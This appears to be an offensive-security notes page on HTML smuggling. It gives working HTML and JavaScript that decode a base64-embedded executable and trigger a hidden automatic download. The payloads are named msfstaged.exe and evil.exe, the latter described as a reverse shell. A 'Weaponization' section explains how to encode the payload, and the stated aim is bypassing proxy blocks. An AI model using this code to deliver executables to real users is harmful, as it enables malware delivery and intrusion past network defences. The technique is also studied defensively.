Secondary Categories: 02-Social Engineering


Description:

This technique leverages the HTML5 anchor tag download attribute,which instructs the browser to automatically download a file when a user clicks the assigned hyperlink.

<html>
	<body>
		<a href="/msfstaged.exe" download="msfstaged.exe"\>DownloadMe</a>			
	</body>
</html>

When a user clicks this link from an HTML5-compatible browser, the msfstaged.exefile will be automatically downloaded to the user’s default download directory.

Although this works well, it exposes the filename and extension of the dropper and requires the user to manually click on the link. To avoid this we can trigger the download from an embedded JavaScript file. This method feeds the file as an octet stream and will download the assembled file without user interaction.

<html>
	<body>
		<script>
			function base64ToArrayBuffer(base64) {
				var binary\_string = window.atob(base64);
				var len = binary\_string.length;var bytes = new Uint8Array( len );
				for (var i = 0; i < len; i++) 
				{ 
					bytes\[i\] = binary\_string.charCodeAt(i);
				}
				return bytes.buffer;
			}
			var file = <FILE IN BASE64>
			var data = base64ToArrayBuffer(file);
			var blob = new Blob(\[data\], {type: 'octet/stream'});
			var fileName = 'msfstaged.exe';
			var a = document.createElement('a');
			document.body.appendChild(a);
			a.style = 'display: none';
			var url = window.URL.createObjectURL(blob);
			a.href = url;a.download = fileName;
			a.click();
			window.URL.revokeObjectURL(url);
		</script>
	</body>
</html>

In order to get theis to work with Microsoft Edge you must use window.navigator.msSaveBlob

EXTENDED

HTML smuggling is a technique that allow bypassing proxy blocks for certain file types that the user is trying to download. You can use HTML smuggling to force the user to download those files onto the system.

Weaponization

First we need to base64 encode our file(s).

base64.exe evil32.exe > .\evil.txt
cat evil32.exe | base64 > b64-payload.txt

Then we just insert the file into our HTML file and utilize javascript to decode the string and download it to the victims system.

<!-- code from https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
<html>
    <body>
        <script>
            function base64ToArrayBuffer(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            
            var bytes = new Uint8Array( len );
                for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }
 
            // 32bit simple reverse shell
            var file = '<BASE64-FILE>';
            var data = base64ToArrayBuffer(file);
            var blob = new Blob([data], {type: 'octet/stream'});
            var fileName = 'evil.exe';
 
            if (window.navigator.msSaveOrOpenBlob) {
                window.navigator.msSaveOrOpenBlob(blob,fileName);
            } else {
                var a = document.createElement('a');
                console.log(a);
                document.body.appendChild(a);
                a.style = 'display: none';
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);
            }
        </script>
    </body>
</html>

Resources:

Also Check Out:

  • Placeholder